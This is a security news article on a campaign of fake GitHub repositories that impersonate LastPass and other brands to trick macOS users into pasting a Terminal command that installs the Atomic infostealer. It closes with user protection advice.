Fake Password Managers Infect macOS with Atomic Stealer

LastPass developers warn that threat actors are targeting macOS users by impersonating popular products on GitHub and pushing info-stealers disguised as legitimate installers.

Security teams say attackers create fake repositories that appear to host macOS software from well-known vendors, then use search-engine optimization to push those malicious links to the top of search results. In LastPass’s case, the fake repositories redirected visitors to a page that delivered the Atomic infostealer (also known as AMOS).

LastPass discovered two impersonating GitHub repositories published on September 16, 2025; both repositories have since been removed. The accounts behind the repositories — posted under the username modhopmduck476 — included links purporting to install LastPass on a Mac. Instead, those links led to a malicious webpage on macprograms-pro[.]com that persuaded users to copy and paste a command into a Terminal window.

That single pasted command runs a curl request to an encoded URL. The encoded payload downloads an “Update” binary into the user’s Temp directory and runs it — a classic social-engineering vector often called a ClickFix-style attack: the victim is tricked into executing a command they do not understand, and that single action installs malware.

The downloaded binary is the Atomic infostealer for macOS, a macOS-focused info-stealer first observed in 2023 and recently seen with an added backdoor component. According to researchers, this campaign has been active since at least July 2025.

The fraudsters have not limited themselves to LastPass. The campaign has impersonated financial institutions, other password managers, major tech companies, AI tools, crypto wallets, and productivity apps. Reported brand names include 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. To conceal activity and avoid takedown, attackers used numerous GitHub accounts and repeated naming patterns that combined the target brand with references to Mac.

Researchers say the campaign’s goals are typical for info-stealers: harvest credentials, session tokens, and other sensitive data that can be monetized or used for further attacks. The addition of a backdoor in recent Atomic builds raises the stakes, giving attackers persistent access to compromised systems.

How to protect yourself

• Never paste commands from untrusted websites into Terminal. If you must run a command from the web, verify it line-by-line with a trusted peer or security professional.
• Download macOS software only from official vendor sites or verified app stores. Avoid third-party sites that mimic legitimate vendors.
• Check a GitHub repository’s history and author before running or installing software. New accounts with few contributions are red flags.
• Use endpoint protection and keep macOS and security tools up to date.
• If you suspect compromise, disconnect from the network and run a full forensic scan or contact an incident response service.

The campaign highlights how simple social engineering combined with platform abuse can bypass casual safeguards. LastPass and other security teams continue to monitor and request takedowns of fraudulent repos; users should remain cautious when searching for software downloads.